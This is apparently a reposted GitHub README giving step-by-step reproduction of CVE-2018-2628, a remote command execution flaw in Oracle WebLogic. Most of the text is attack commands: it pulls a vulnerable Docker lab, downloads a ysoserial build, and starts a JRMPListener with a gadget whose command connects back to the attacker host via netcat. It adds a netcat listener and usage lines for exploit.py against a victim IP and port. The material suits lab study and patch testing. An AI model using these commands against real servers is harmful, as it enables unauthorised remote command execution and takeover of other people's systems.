Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization

[Nytro]

IMPORTANT: Is provided only for educational or information purposes.

Description

April 17, 2018, Oracle fixed a deserialization Remote Command Execution vulnerability (CVE-2018-2628) on Weblogic server WLS Core Components .

Vulnerable:

• 10.3.6.0
• 12.1.3.0
• 12.2.1.2
• 12.2.1.3

Environment

Run below commands to create a vulnerable Weblogic server (10.3.6.0):

docker pull zhiqzhao/ubuntu_weblogic1036_domain
docker run -d -p 7001:7001 zhiqzhao/ubuntu_weblogic1036_domain

Reproduce Steps

1. Run below commands on JRMPListener host:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'

2. Start a listener on attacker host: nc -nlvp 4040
3. Run exploit script on attacker host:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
e.g.
    a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)
    b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)

Reference

• http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
• http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

 

Sursa: https://github.com/brianwrf/CVE-2018-2628